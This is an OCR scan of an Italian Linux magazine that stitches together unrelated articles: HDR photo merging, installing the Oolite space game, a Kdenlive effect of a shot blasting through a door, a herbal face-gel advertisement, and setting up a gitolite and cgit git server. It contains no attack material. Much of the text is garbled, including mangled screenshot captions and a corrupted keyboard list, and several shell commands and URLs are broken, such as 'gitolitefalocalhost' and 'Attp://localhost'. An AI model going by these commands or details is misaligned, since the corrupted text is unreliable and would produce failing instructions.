®) Maschera rigida 


Esposizione: ì 


Saturazione: “\{}jil}iti: 


Contrasto: 


MITO AZINET Ln 
(NERE MANA RENE EMRTA: 


{) Usa modello di aspetto del colore 


= {E Impostazioni di salvataggio 


Output file format: JPEG 


| Da salvare 


me CEOWL 


Destinazione Ingressi 


| © esi DSCO2825:hdr-09jpg DSCO9SGOJPG: DSC... 


9 Anteprima E salva © Chiudi 


#_# © = 10:51 MM = 


che siano scattate con treppiede, 
basta che non siano troppo mos- 
se. Selezioniamo tutte le immagini 
da usare e clicchiamo su Succes- 
sivo. Se si seleziona la casella Alli- 
nea le immagini scattate a for- 
cella il programma si prenderà 
qualche minuto per confrontare le 
varie fotografie e trovare il modo di 
allinearle perfettamente. Questo è 
fondamentale se le foto sono state 
scattate senza treppiede, perché 
se non sono perfettamente so- 
vrapponibili tutti gli oggetti appari- 
ranno con bordi multipli. Comple- 
tato l'allineamento delle immagini, 
è possibile procedere alla sovrap- 
posizione: nella finestra che appa- 
re si possono vedere le varie im- 
magini, e sono disponibili varie 
impostazioni predefinite per Espo- 
sizione, Saturazione e Contra- 
sto. Cliccando sul pulsante Ante- 
prima si può controllare il risultato 
attuale: si possono poi apportare 
modifiche alle impostazioni e pro- 
vare di nuovo l'anteprima. Quando 
si è soddisfatti, basta cliccare su 
Salva per salvare in JPG o PNG. 
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un’opera spazial 


E Un titolo ispirato a uno storico gioco del passato che ci permette 
di esplorare e fare affari nello spazio. Senza farci mangare 
l'adrenalina dei combattimenti! 


Licenza: GNU GPL 
Sito Web: www.oolite:org 


Ce hanno, o avevano, in comune 
computer.come Atari ST, Commodore 
64, ZX Spectrum e altri modelli 
dell’epoca? Di sicuro Elite, un gioco di 
commercio spaziale per le piattaforme 
riportate, ma oggi privo di alcun interesse 
commerciale poiché obsoleto (appartiene 
alla categoria degli abandonware, ovvero 
software non più sviluppati ma protetti ancora 
dal diritto d’autore). Nel 2003 un remake 
moderno di tale gioco è rinato sotto il nome di 
Oolite. Inizialmente sviluppato solo per OS X, 
il porting su GNU/Linux venne fatto nel 2005, 
ma solo nel 2007 fu è stato rilasciato con 
licenza GNU GPL. A partire dal 2009 è entrato 
nella classifica come uno dei 10 migliori 
giochi da provare. Ancora è in piena fase di 
sviluppo, pertanto nuove. funzioni e mondi 
sono in continua aggiunta. Scopriamo come 
installarlo e come approcciarlo. 


L'INSTALLAZIONE 


Poiché si parla di un software Open 
Source, allora 3 sono le possibili modalità di 
installazione. Compilare da sorgenti installando 
dapprima il software Git (htips:/git-scm.com)/, 
presente nei repository di tutte le distribuzioni, 
quindi clonare il deposito dei sorgenti del 
gioco per passare alla compilazione così come 
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Oolite Theme Music by-NoSiee] © 2004 


Start New Commander 


Load Commander 
View Ship Library 
View Keyboard Settings 
Manage Expansion Packs 
Exit Game 


Fig. 1 Il menu animato di Oolite 


riportato nel wiki dedicato. Il secondo metodo 
è verificare se il gioco è pacchettizzato 
per la nostra distribuzione, eventualmente 
configurando repository dedicati. Ma 
se vogliamo divincolarci dal gestore dei 
pacchetti e dal fastidio della compilazione 
- tra errori e dipendenze da soddisfare - 
possiamo puntare il browser al sito del gioco, 
andare nella sezione Download e optare per 
i precompilati della versione stabile o test (al 
momento in cui scriviamo, rispettivamente 
1.86 e 1.88). AI termine del download del 


file oolite-1.86.linux-x86_64.tgz (circa 
100 MB), o della versione 32 bit in funzione 
della piattaforma in uso, passiamo alla 
decompressione con tar xzvf oolite-1.86. 
linux-x86_64.tgz. Viene estratto il file 
oolite-1.86.linux-x86_64.run che lanciamo 
con il comando ./oolite-1.86.linux-x86_64. 
run. Dopo la verifica di integrità dell’archivio 
verrà chiesto se installare il gioco nella 
propria home directory o meno: Install 
Oolite system-wide or in your home 
directory? [s/H]. Pigiamo H seguito da 


Invio per installarlo nella home. Viceversa, 
qualora volessimo metterlo a disposizione per 
l'intero sistema dovremo lanciare il file .run 
con i permessi dell'amministratore e optare 
per “s”. Ipotizzando la prima scelta al termine 
dell’installazione troveremo il gioco in /home/ 


nome_utente/GNUstep/Applications/ * 


Oolite/ che avvieremo lanciando l'eseguibile 
colite per vedere dopo pochi secondi il menu 
visibile in Fig. 1. 


PARTICOLARI DI OOLITE 


Il gioco inizia con noi al comando della 
navicella Cobra Mark Ill: di certo, come 
potremo appurare giocando, non la migliore 
ma ha un equipaggiamento e un'autonomia di 
tutto rispetto. Quando si hanno a disposizione 
soldi a sufficienza, anche con la vendita della 
propria navicella, è possibile acquistarne di 
più capienti se vogliamo indirizzare la nostra 
attività nei trasporti, oppure una più agile e 
veloce per scopi non proprio onesti. Il mondo 
di Oolite ha una propria indipendenza: ogni 
astronave, cv dalla nostra, persegue il 
proprio obiettivofeomandata dall’intelligenza 
artificiale del. computer. Allora non è 


UN GIOCO PER TUTTI 


Non ci sono scuse per non giocare 


Il titolo originale, per la potenza {grafica e 


CPU) dei computer dell'epoca, era caratte- 
rizzato dai cosiddetti wireframe ovvero di 
una navicella, o un qualsiasi oggetto solido 
in generale, di cui si avevano solo i contor- 
ni, come se fosse stato costruito con del fil 
di ferro: in questo modoi calcoli sono molto 
meno pesanti da portare a termine. Lo svi- 
luppatore di Oolite, sebbene si sia ispirato 
all'originale Elite, ha voluto fornirgli un 
tocco di grafica più moderna utilizzando le 


OpenGL per i modelli solidi, ma senza ap- 
pesantirlo. Tant'è che un vecchio computer 
o un portatile entry level lo può lanciare 
senza alcun problema pur godendo di ef- 
fetti moderni. Nulla vieta agli sviluppatori 
di adottare un moderno motore grafico, ma 
il loro scopo è quello di rimanere ancorati 
alle modalità del gioco dal quale si sono 
ispirati. Il titolo è single-player pertanto 
non necessita di una connessione a Inter- 
net (compresi eventuali Expansion Pack 


raro vedere astronavi pirata inseguite da 
astronavi poliziotto così come imbattersi in 
combattimenti nei quali possiamo intervenire 
o continuare per la nostra strada. In buona 
sostanza il gioco lo creiamo noi di volta 
in volta: il punto di partenza è sempre lo 
stesso, ma in funzione delle scelte possiamo 
imbatterci in una marea di situazioni differenti. 
Qualche parola vogliamo spenderla per gli 


‘Prima alleniamoci 


Dopo aver imparato i comandi c’è il tutorial integrato 


Keyboard Settings. 
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Fuel Infectore 
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Roli let 
Roll right 
Accelerate 
Mouse contro 
Forward view 01 
Att view 2 
Bart view 3 
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Status ecreons 
Chart screens. 
Systam screene 
Market screens 
Show chart icons 
Route planner 


‘GUI LEM 

‘GUI Right 

GUI Up 

GUI Down 
Home map 
Chart highlight 


Starboard view: 
External view 
Tako snapshot 


Fire laser 
Ident system 
Weapons toggle 
Next target 


Launch missile 
Target missile 
Next missile 
Previous target! 


ECM 

Unterget missile 
Target incoming 
Escape Podi Escorse 
Torss dre 
Docking computer 


Witehspace jump 
Fast docking 


Galactic jump 9 
Request clearance L 
Docking musie 

Zsom scanner ' 
Unzsom scanner ) 
Comme log 


‘ASO back 
ASC forward 
Select MFD 


Dump cargo 
Rotate cargo 
Cycle MED 


Select tem 
tem shortcut 1 


Item button i fem button 2 b 


Remshorieut2 Tab 


Pause DI Show FPS F Toggle HUD C) 
See documentation for more Information. Press space to retum to the menu 


I COMANDI 
| Una caratteristica dei giochi 

di trading ed esplorazioni nel- 
lo spazio è la presenza di una navicella 
che va governata con tutte le possibilità 
che il gioco mette a disposizione e 00- 
lite ne mette tante. Dal menu generale 
{Figura 1) spostiamoci con i tasti freccia 
sulla voce View Keyboard Settings e 
premiamo Invio. 


Start New Commander 
Return to Mony 
Norma! Start 
Easy Start 


Strict Mode 


» 
i 
pro 


Take a standard Cooperative flight training course, including simulated combat and 
docking practice. 


ALLENAMENTO 
02 Dopo aver appreso i co- 

mandi, rientriamo nel 
menu e, seguendo la medesima 
dinamica, optiamo per Start New 
Commander. Nella nuova schermata, 
utilizzando i tasti freccia, spostia- 
moci sulla voce Tutorial e premiamo 
due volte Invio, la seconda volta dopo 
aver letto la prima schermata. 


Expansion Packs. In totale, al momento 
in cui scriviamo, sono ben+555 e ognuno 
riguarda un aspetto del gioco: dalla 
grafica migliorata con l’uso degli shader 
OpenGL qualora la scheda grafica dovesse 
supportarli, all'aggiunta di nuove attività di 
gioco (trivellamento asteroidi, contratti in zona 
vendita etc), così come nuovi sistemi, pianeti, 
ecc. Dopo aver seguito il tutorial suggeriamo 


GLI SLALOM 
03 It gioco non è localizzato in 

Italiano pertanto dovremo 
avere un minimo di dimestichezza con 
l'inglese. Nelle prime fasi del tutorial 
verrà spiegata l'interfaccia HUD [Heads- 
up Display] ovvero le informazioni co- 
stantemente visibili durante tutto il gioco 
per poi passare al controllo semplice in 
una zona piena di asteroidi. 
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Si fa sul serio! 


Mettiamo in pratica le lezioni del 


ATTERRAGGIO 

Una delle manovre più difficili 

è l'attracco alle stazioni di Co- 
riolis (praticamente sistemi orbitanti che 
ruotano su se stesse al fine:di creare una 
gravità artificiale all'interno). La manovra 
di avvicinamento e atterraggio nell'hangar 
dovrà seguire la rotazione della stazione, 
altrimenti rischiamo di sbattere e distrug- 
gere la navicella. 


tutorial 


ARBITRI (+11 FETO? LITAS ETTI PONI, 


SI GIOCA "n 

Al termine della fase di add 

stramento, che vedrà anche 
l'uso delle armi a disposizione sulla no- 
stra navicella (laser e missili), potremo 
decidere se ripetere il tutorial oppure se 
passare al gioco. Optiamo per quest'ulti- 
ma scelta: dal menù generale Start New 
Commander quindi per Normal Start nel- 
la schermata successiva. . 


L'INIZIO 
Le condizioni di partenza son 

quelle riportate nell'articolo e 
visibili nel passo precedente. Premendo F2 
si accede a un menù dal quale è possibile 
optare per Game Options e regolare i pa- 
rametri audio e grafici. Per migliorare l'al- 
lestimento della nave e/o fare i girovaghi 
nello sfizio occorre iniziare a guadagnare 
facendo del commercio. 


di installare l’extension pack Addons for 
Beginners (che si porterà dietro 240 MB di 
altri Add-On che verranno automaticamente 
scaricati in/home/nome_utente/GNUstep/ 
Library/ApplicationSupport/Oolite/ 
ManagedAddOns/) cliccando su Manage 
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LE MERCI ‘ 

Premiamo F8 per accedere al 

mercato delle materie prime. In 
funzione dei governi, alcune merci possono 
essere trasportate, altre con limitazioni o 
proibite: schiavi (Slaves), droga (Narcotics) 
e armi da fuoco (Firearms] sono illegali. 
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Expansion Packs (nel menu generale) e 
seguendo la medesima dinamica riportata 
nei tutorial. Il risultato sono le nuove immagini 
visibili nelle foto della sessione di gioco — 
unitamente ad un audio più coinvolgente - 
che altrimenti apparirebbero come quelle del 


Ore 


< Gancio CHAfti } 
‘ O } 


IL TRASPORTO 

Scelte le merci, in funzione dei 
soldi a disposizione e del quan- 
titativo trasportabile, dobbiamo portarle 
per la vendita e guadagnare i primi soldi. 
Pigiamo F6 e decidiamo di portare le mer- 
ci sul sistema Leesti. 


tutorial di gioco, un po’ troppo “spoglie”. Infine, 
per gli appassionati del genere, segnaliamo 
il remake di.Elite Il ovvero Pioneer Space 
Sim (https/pioneerspacesim.nef) attivamente 
sviluppato e di cui ci siamo già occupati nel 
numero 167 di Linux Magazine. 


LA CONSEGNA 

Il cerchio verde indica il limite di 

autonomia della navicella. Con 
F1 usciamo dalla zona di acquisto/vendite. 
Puntiamo nello spazio profondo e pigiamo 
w per accelerare, quindi h per saltare 
nell’iperspazio e arrivare a destinazione. 
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M u I t i m e d i a 


Non sfondate 
quella porta! 


I Con Kdenlive possiamo modificare gli oggetti delle nostre scene. 
Ecco come far comparire un buco in una porta 


ra i tanti cliché dei film d’azione c’è la distruzione di oggetti. 

E una delle situazioni più versatili è lo sfondamento di una por- 

ta, soprattutto nei film d’azione. Con un calcio, un pugno o un 
colpo di fucile. Il problema, per i cineasti non professionisti, è che è 
un effetto abbastanza difficile da realizzare direttamente in camera se 
non si ha un certo budget. Distruggere porte ha un costo ed è comun- 
que difficile da fare nella realtà: bisognerebbe costruire una porta fin- 
ta, perché una vera potrebbe non rompersi facilmente (nessun attore 
può davvero fare un buco con un calcio in una porta di legno spessa 
3-4 centimetri). E per ovvi motivi di sicurezza non è una grande idea 
usare un fucile a pallettoni carico per fare un vero buco in una porta! 
La soluzione più a portata di mano consiste nel praticare il foro in 
modo digitale, così non spenderemo un solo centesimo e non met- 
teremo in pericolo nessun attore. L’effetto di base è semplice, perché 
si basa sul rotoscoping. Come base di partenza abbiamo bisogno di 
due clip video: una dovrà riprendere semplicemente la porta (o even- 
tualmente il muro) da sfondare. L'altra clip video dovrà contenere l’at- 


tore che fa il gesto di sfondare la porta, ad esempio con un colpo di 
fucile. L'attore dovrà trovarsi nella stessa posizione in cui si trova la 
porta: basta aprirla e girare il filmato, non importa.se un pezzo della 
porta è comunque visibile assieme all’attore. Di questa clip useremo 
solo una piccola porzione: non serve scardinare la porta e rimuoverla 
del tutto, tanto non la si vedrà comunque nel risultato finale. Ovvia- 
mente, al momento del montaggio la clip con la porta chiusa deve 
essere messa sopra la clip con l'attore e la porta aperta. Per aprire 
il buco nella porta basta applicare alla sua clip l’effetto rotoscoping, 
ma invertito (con l'apposita spunta). In questo modo tutto ciò che è 
contenuto nel disegno che realizziamo diventerà trasparente e si potrà 
vedere il filmato che c’è sotto. 

Disegniamo, quindi, il contorno di quello che sarà il buco: non deve 
essere troppo regolare, nella realtà è improbabile fare un foro perfet- 
tamente circolare. Poi, per non far comparire il buco da un momento 
all’altro, utilizziamo i fotogrammi chiave dell’effetto rotoscoping per 
rimodellare i contorno del foro in modo da farlo crescere man mano. 


Sovrapponiamo le clip iniziali 


Ecco come posizionare nelle tracce video le clip della porta e dell’attore 
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PRIMA L'ATTORE... 

Per cominciare posizioniamo la clip che con- 

tiene l'attore nella traccia video più bassa, la 
Video1. Naturalmente, tagliamo la clip per eliminare parti 
non necessarie usando lo strumento forbici. 
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«POI LA PORTA 
0 2 Nella traccia Video2, invece, va posizionata la clip video 
che contiene la porta. Le due clip devono essere so- 
vrapposte: quella della traccia Video1 deve finire esattamente nello 
stesso momento della clip con la porta chiusa. 
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In altre parole, all’inizio della clip il buco deve essere tanto piccolo da 
non essere visibile, e nel giro di una ventina di fotogrammi o poco più 
deve crescere fino alla sua dimensione finale. L'effetto sarà veloce, 
quindi non è fondamentale essere troppo attenti al movimento che 
si disegna, l'importante è che lo spettatore capisca che il foro si è 
ingrandito come è normale che accada. Poi si può aggiungere in so- 
vraimpressione una clip di un muzzle flash, o di schegge di legno che 
volano (debris) per dare maggiore realismo. Noi abbiamo pensato di 
presentare l’effetto con un colpo di fucile che apre un buco attraverso 
una porta, perché è la preparazione di base sulla quale si possono 
poi costruire delle varianti. Qualora si voglia rendere l’effetto con un 
pugno, invece che con un colpo di fucile, basta far dare all'attore un 
pungo nel vuoto, usando poi il rotoscoping per rendere visibile non 
soltanto lo sfondo ma anche la mano che passa attraverso il foro. 
Ecco un video di esempio: www.edmaster.it/url/7341. 


Pl; Madia | Pogoet Tool) Clip Tenia btu 


Piran Riise. 


in enna 
mM para ina 

E i 
MIRA eri pg 


mi RD 
poi niiate ioni sconta 


LA TRANSIZIONE 

Tra le due clip dobbiamo ora inserire una tran- 
sizione di tipo Composito. La transizione deve 
essere estesa per tutta la durata della clip più corta, cioè 
di quella che contiene l'attore. Non serve modificare i pa- 
rametri fondamentali. 
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IL ROTOSCOPING 

(«9 Aggiungiamo alla seconda clip della traccia Vi- 
È. deo2, quella sovrapposta alla clip dell'attore, 

l'effetto rotoscoping spuntando Inverti. Per aiutarci nel di- 

segno provvediamo a rendere invisibile la traccia Video2 

cliccando sul suo apposito pulsante. 
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I Fig. 1 ©Il foro nella porta comincia a comparire assieme a un flash 


Ve US cone 


(CI etto pae cun sind 


IPRROTR] ciorsre 
1} fig! 
Ì DIZIR 
10. PETRONE conv 
| Aff: Penati 


IL GIUSTO TAGLIO 

È una buona idea dividere la clip con la porta: utilizzan- 
do lo strumento forbici possiamo tagliarla nel momen- 
to in cui comincia la clip che contiene l'attore. Avremo quindi due 
clip affiancate e praticamente uguali. Però la seconda delle due 
è sovrapposta all'attore. 
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DISEGNIAMO IL FORO 

Bisogna disegnare il contorno di quello che sarà 
il foro nella porta: mentre la traccia Video2 non 
è visibile possiamo capire quale dovrà essere la corretta 
posizione. Rendendo di nuovo visibile la porta si può con- 
trollare di avere ottenuto l'effetto desiderato. 


IL MOVIMENTO DELLA CAMERA 


Per aggiungere realismo alla scena possiamo anche inserire un movi- 
mento: dopo avere renderizzato con Kdenlive la sequenza in cui l’at- 


tore fa il buco nella porta, possiamo importarla in un altro progetto di - 


Kdenlive e sovrapporla a una clip colore nera usando una transizione 
di tipo Affine. A quel punto possiamo ingrandire un po’ l’immagine: 
se stiamo realizzando un filmato in Full HD possiamo aumentarne le 
dimensioni fino al 120% senza che nessuno se ne accorga. Usando 
i fotogrammi chiave della transizione possiamo muovere su e giù, a 
destra e a sinistra, l’immagine nella frazione di secondo in cui il buco 
nella porta compare. Questo farà credere al pubblico che la cinepresa 
sia stata scossa dallo stesso colpo che ha aperto il foro nella por- 
ta. Si può anche aggiungere una leggera rotazione, ma non bisogna 
esagerare altrimenti si capisce che l’immagine è finta perché viene a 
mancare la prospettiva. 


BI Fig. 2 «Attraverso il foro nella porta si vede l'attore 


Un’animazione per la comparsa del foro 


Creiamo un'animazione per far comparire il foro nella porta. È semplice! 
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BORDI SMUSSATI 

Per non rendere i bordi troppo netti, non sareb- 

bero realistici, si può impostare la feather width a 
2. Adesso spostiamoci lungo la timeline dell'effetto e sce- 
gliamo il punto in cui il foro nella porta deve essere forma- 
to: qui si deve creare un nuovo frame chiave. 
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ALL'INIZIO NON C'È 

Il primo fotogramma deve avere un foro praticamente in- 

visibile: basta avvicinare tutti i punti del disegno fatto col 
rotoscoping in modo che risultino sovrapposti. Controllando l'ani- 
mazione, deve sembrare che il foro diventi man mano più grande. 
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L'ANIMAZIONE 

Cominciamo ad andare indietro, giusto un paio di 

fotogrammi alla volta, e impostiamo nuovi fra- 
me chiave: in ciascuno di essi riduciamo la dimensione del 
foro che abbiamo disegnato, procedendo sempre in manie- 
ra graduale. 


UN MUZZLE FLASH 

Adesso abbiamo bisogno di un muzzle flash fron- 
tale, possibilmente animato: ne troviamo uno 
all'indirizzo www.edmaster.it/url/7342. Basta scaricare la .gif 
sul computer e utilizzarla nel nostro progetto. 
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Aggiungiamo l'esplosione! 


Inseriamo un muzzle flash per dare l’impressione che il foro sia stato creato da un fucile 
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I FOTOGRAMM 
0 1 L'immagine che abbiamo scaricato nel tutorial pre- 
cedente è una .gif: per avere il massimo controllo 
dobbiamo convertirla in una serie di immagini. Possiamo 
farlo usando ImageMagick, con il comando convert -coale- 
sce nome_immagine.gif out%05d.png. 
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SOVRAPPOSIZIONE 

Come durata di ogni immagine, possiamo impostare 

00:00:00:02, ma dipende anche da quello che volete ot- 
tenere. La clip va poi messa nella traccia Video3, sovrapponendola 
ai primi istanti in cui si forma il buco nella porta. 


CON MENO OPACITÀ 

Possiamo anche usare i fotogrammi chiave per 

dare alla clip una opacità variabile, possibilmente 
mai oltre il 90%. Si può cominciare e finire con lo 0%, tenen- 
do tra il 90 e l'80% nei fotogrammi intermedi. 
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VA CLIP 

02 Ora possiamo produrre una clip presentazione 

in Kdenlive, spostandoci in Progetto/Aggiungi 

clip presentazione. Dobbiamo specificare la cartella in cui 

si trovano le immagini prodotte da ImageMagick e il for- 
mato PNG. 
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UNA TRANSIZIONE 
0 La clip deve avere una transizione di tipo Composite and 
transform, con Compositing impostato a Screen. Usan- 
do la transizione, possiamo posizionare e ridimensionare la clip 
come necessario per farla sembrare la fiammata del fucile. 


UN COLPO DI LUCE 

Possiamo applicare alla clip che contiene la porta dopo 

l'inizio della comparsa del buco, l'effetto Luminosità. 
Nell'istante in cui appare la fiammata alziamo la luminosità a 120 
punti, riportandola gradualmente a 100 nel resto della clip. 


Una formula in gel, specifica per il viso, con mirate 
proprietà sebo-equilibranti in virtù degli estratti 

di Bardana e Salvia e dell'olio essenziale di Limone 
dalle proprietà purificanti e leggermente astrigenti. 
L'azione meccanica delle finissime microsfere 

di noccioli di Mandorle dolci agevola 
l'allontanamento delle cellule morte e rende la 
pelle più levigata, ricettiva e pronta ad assorbire 

i principi attivi più mirati. Ideale per le pelli 

miste, tendenti al grasso e, in particolare, per la 
zona centrale a T soggetta a maggiori impurità e 
oleosità. Contrasta efficacemente gli inestetismi 
tipici dell'adolescenza: punti neri, untuosità, 
arrossamenti... 
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L'efficacia nelle erbe 
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L'eMescia nelle erbe 
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ll’inizio c'era CVS, poi SVN (0 

subversion). Fin dagli anni ‘80 i 

rogrammatori hanno avuto bisogno 
di sistemi per gestire le diverse versioni di 
un software e questa necessità è aumentata 
con proporzionalmente alla complessità dei 
programmi. Più un software è “lungo”, più 
persone ci devono lavorare contemporaneamente 
per seguire le varie parti del codice. E più persone 
ci lavorano, più difficile sarà far coincidere 
perfettamente le varie modifiche: è ovvio che 
se più sviluppatori lavorano allo stesso codice 
dovranno avere tutti l’ultima versione possibile 
dei vari file, altrimenti alla pubblicazione della 
modifica si rischia di non includere quelle fatte 
da qualcun altro. Il sistema CVS era elementare, 
ma aveva una serie di limitazioni che lo rendevano 


MANCHE 10 
USO GITMIO 


È il sistema di controllo delle versioni di file più diffuso 
e utilizzato dagli sviluppatori. Ma come funziona 
e come utilizzarlo? Scopriamolo subito 


goffo e poco pratico. Poi è arrivato Subversion, 
chiamato SVN, il cui slogan è stato “CVS fatto 
bene”. Ma anche questo risultava scomodo in 
diverse situazioni. Come diceva Linus Torvalds, 
“non c’è modo di fare CVS bene”. In fondo, CVS 
e SVN furono progettati in altri tempi, quando la 
scrittura dei software aveva ben altri requisiti. Oggi 
come oggi, gestire progetti di grandi dimensioni 
con questo sistema sarebbe una sofferenza. Per 
questo motivo Torvalds ha sviluppato un proprio 
sistema di controllo delle versioni chiamato 
Git. È completamente Libero e Open Source e 
i suoi vantaggi lo hanno reso tanto popolare da 
essere quasi il sinonimo di “sistema di controllo 
versione”. Se abbiamo scritto un software, 
probabilmente abbiamo usato Git per la gestione 
del suo codice. Ma la programmazione non è 


» 
Il modo più semplice per gestire un server Git è È necessario creare e poi leggere la chiave pub- 
usare gitolite, ma prima di installarlo è necessario blica con un programma come cat per copiarla 
preparare un utente da utilizzare come amministratore: sudo negli appunti, per poterla incollare durante la configurazio- 
adduser --system --shell /bin/bash --group --disabled-password ne. Lanciamo sudo -u gitolite ssh-keygen seguito da sudo -u 


--home /var/lib/gitolite gitolite. gitolite cat /var/lib/gitolite/.ssh/id_rsa.pub. 
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l’unico caso nel quale un sistema di controllo delle versioni può tornare utile. 
Se si lavora con file di testo (ad esempio nel mondo universitario o in ufficio) è 
molto utile poter registrare le varie versioni, in modo da avere una cronologia 
e controllare le modifiche che sono state apportate. È una buona soluzione 
anche per i backup, in modo da poter ripristinare specifiche versioni dei file 
(non sempre l’ultima versione è quella che si desidera). Questo diventa ancora 
più importante quando si lavora con altre persone e si deve collaborare alla 
stesura del testo. Pensiamo ad esempio agli accademici che scrivono tesi in 
LaTex o chiunque lavori in ufficio e voglia tenere traccia delle modifiche che 
fa ai propri file condividendoli con i colleghi che lavorano agli stessi progetti. 
Infatti, i documenti di LibreOffice si possono salvare nel formato .fodt, che 
è un unico file di testo. Questo permette di gestire le modifiche in modo 
semplice (i normali file ODT sono scomodi da confrontare tra loro). Certo, 
si potrebbe usare uno strumento come Google Drive, ma spesso non offre la 
personalizzazione necessaria per alcune attività. Senza contare che rimane 
sempre il problema della sicurezza, considerato che non c'è modo di sapere 


Tutto il necessario 


cosa succeda ai propri file quando sono archiviati sui server di Google: per 
documenti riservati la fiducia che normalmente riponiamo in Big G potrebbe 


non bastare. La soluzione è quindi implementare Git sui propri sistemi per 
avere il massimo controllo. Il client git è facilmente installabile su qualsiasi 
sistema operativo, in particolare sulle distro GNU/Linux. La sua interfaccia 
a riga di comando potrebbe, però, non essere facile da utilizzare. Per questo 
si può ricorrere a una interfaccia web, come CGit, semplice, gratuita e Open 
Source. Questa interfaccia permette a chiunque di mettere in piedi un server 
Git nella propria rete locale o all’interno del proprio PC, per gestire le versioni 
dei propri file. Inoltre, possiamo sfruttare il sistema gitolite per semplificare la 
gestione degli utenti e dei repository. 


ANCHE | FILE LIBREOFFICE 


Come già anticipato, è possibile gestire i propri file ODT con git salvandoli in 
formato flat XML, cioè con l’estensione .fodt. In questo modo viene prodotto 


Installiamo il gestore gitolite e l'interfaccia web cgit 


Configuring gitolite 

{ Please specify the key of the user that will administer the access 

I configuration of gitolite. 

I 

| This can be either the SSH public key itself, or the path toa file 

i containing it. If it is blank, gitolite will be left unconfigured and 
| must be set up manually. i 


I 
| Adninistrator*s SSH key: 
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INIZIA IL SETUP 
01 Installiamo il programma gitolite con i coman- 
di sudo apt-get install gitolite e sudo dpkg- 
reconfigure gitolite. La procedura di configurazione 
richiederà l'inserimento del nome utente e della chiave 
crittografica pubblica. 


File Modifica Visualizza Impostazioni Aiuto 


zioni Annulta: Patchetto IRIsbIUtOre” Cerca vnopzioni Viste AIuto : 
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Segnalibri 


INTERFACCIA WEB 
03 Questo metodo di gestione del repository, 
però, non è molto pratico. L'interfaccia web 
cgit si può installare con i comandi: sudo apt-get in- 
stall cgit e sudo a2enmod cgi, se si sta utilizzando un 
server web Apache2. 


LE IMPOSTAZIONI 
02 Per procedere alla configurazione degli utenti e dei 
repository lanciamo i seguenti comandi: git clone 
gitolitefalocalhost:gitolite-admin.git e cd gitolite-admin. 
Basta aggiungere la loro chiave pubblica in un file del tipo 
keydir/nomeutente.pub. 


G Iù Git repository browser 


a fast webintertace for the git dscm 


index 


No repositories found 


GIT NEL BROWSER 
04 In questo momento cgit sarà raggiungibile da un 
browser all'indirizzo Attp://localhost/cgit/. | pro- 
blema è che è vuoto, perché non ancora configurato. Si può 


comunque provare a visualizzare l'interfaccia per assicurarsi 
che l'installazione abbia funzionato. 
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un unico file di testo che contiene tutto, immagini comprese. Il file può quindi 
essere processato automaticamente da git e si possono confrontare le varie 
versioni. Tuttavia, può non essere sempre una opzione praticabile: l'estensione 
«odt è molto più comune e lavorando con altre persone magari è meglio evitare 
di confondere le idee a qualcuno usando estensioni poco conosciute. Quindi, è 
possibile utilizzare anche la normale estensione .odt creando un apposito filtro 
che traduce in tempo reale i normali file (.odt, .0ds, ecc) in file di testo. Bisogna 
prima di tutto creare il file /usr/bin/odf2prettytxt: 


#!/usr/bin/env sh 
set -o errexit 
/usr/bin/odt2txt --raw “$@” | /usr/bin/ 


xmllint --format.- 
rendendolo poi eseguibile con il comando: 


sudo chmod +x /usr/bin/odf2prettytxt 


Questo semplice script utilizza i programmi odt2txt e xmllint, che 
devono essere installati sul sistema. Lo script può poi essere inserito 
nella configurazione di git dando da un qualsiasi terminale il comando: 


git config --global diff .odf.textconv ‘odf2prettytxt” 
Il filtro è quindi disponibile, anche se per ora non è attivo in alcun progetto. 
Per rendere il filtro appena creato attivo in un progetto bisogna, all’interno del 
repository in questione, lanciare il comando: 

echo ‘*.odt diff=odf’ >> .gitattributes 

In questo modo ogni volta che git trova un file ODT sa di doverlo 
confrontare alla versione precedente usando lo script che abbiamo 


creato. Naturalmente, lo stesso filtro si può usare per altre estensioni: 


echo ‘*.ods diff=odf’ >> .gitattributes 


Configuriamo l'interfaccia web 


Dove cercare i repository gestiti da gitolite? 


File. Modifica Visualizza Segnalibri. Impostazioni Aiuto 


DOVE SONO | REPO? 
0 4 Per configurare cgit si usa il file /etc/cgitrc: è im- 
portante dire a cgit dove trovare i vari repository. Ad 
esempio, si può inserire una riga del tipo scan-path=/var/lib/gito- 
lite/repositories ovviamente cambiando la cartella se necessario. 


PERMESSI DI ACCESSO 
0 3 Se ci dovessero essere problemi con la visualizzazione 
dei repository lanciamo usermod -aG gitolite http, 
chmod g+rX /var/lib/gitolite e chmod -R g+rX /var/lib/gitolite/re- 
positories in modo da fornire a cgit i permessi di accesso ai file. 
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git Git repository browser 


Vide 


Generi 
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LA VISUALIZZAZIONE 

0 2 A questo punto l'interfaccia si comporta come quella di 
un qualsiasi altro servizio Web: è possibile controllare 

i file (tree) di ogni singolo repository, ottenere le differenze tra una 

versione e la precedente, scorrere le varie commit. 


Git repository browser 
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DESCRIZIONE REPO 
10] hi Per visualizzare le descrizioni dei vari repositories, cgit 
si basa sul file description presente in .git di ogni repo- 
sitory. Ciò significa che la si può modificare con il comando echo 
"La mia descrizione" > ./.git/description oppure con nano. 


Infatti, è possibile recuperare il testo da tutti i file di LibreOffice, anche i fogli 
di calcolo ODS. Utilizzando lo stesso meccanismo si possono supportare vari 
tipi di file binari, l'importante è riuscire a tradurli in file di testo semplice. 


UN RIEPILOGO COMPLETO 


Per installare e configurare gitolite e cgit, in modo da avere un server git 
pienamente funzionante, bisogna eseguire la serie di comandi indicati nei 
tutorial delle pagine precedenti. Possiamo riassumerli in questo script, che è 
possibile scaricare dalla pagina Web www.edmaster.it/url/7335: 


#!/bin/bash 
sudo adduser --system --shell /bin/bash --group 
--disabled-password --home /var/lib/ 
gitolite gitolite 
sudo -u gitolite ssh-keygen 
sudo -u gitolite cat /var/lib/gitolite/.ssh/ 
id _rsa.pub 
sudo apt-get install gitolite 
gl-setup /var/lib/gitolite/.ssh/id rsa.pub 


Il comando gl-setup automatizza la configurazione di gitolite sulla base della 
chiave crittografica fornita, quindi non richiede intervento da parte nostra. 


git clone gitolite@localhost:gitolite-admin.git 
cd gitolite-admin 

nano conf/gitolite.conf 

git commit -a 

git push origin master 


Per modificare come si desidera la configurazione è ovviamente necessario 
intervenire, ma se non si vogliono apportare modifiche si può anche saltare 
il passaggio di nano. Se poi si vuole applicare la stessa configurazione a tutti 
i propri computer basta creare un file gitolite.conf caricandone il contenuto 
su un server e scaricarlo ogni volta (ad esempio col comando wget). Per 
le chiavi crittografiche degli utenti che si vogliono “creare”, basta entrare 
nel repository gitolite-admin e inserire le chiavi crittografiche nel percorso 


Kernel.org git repositories 


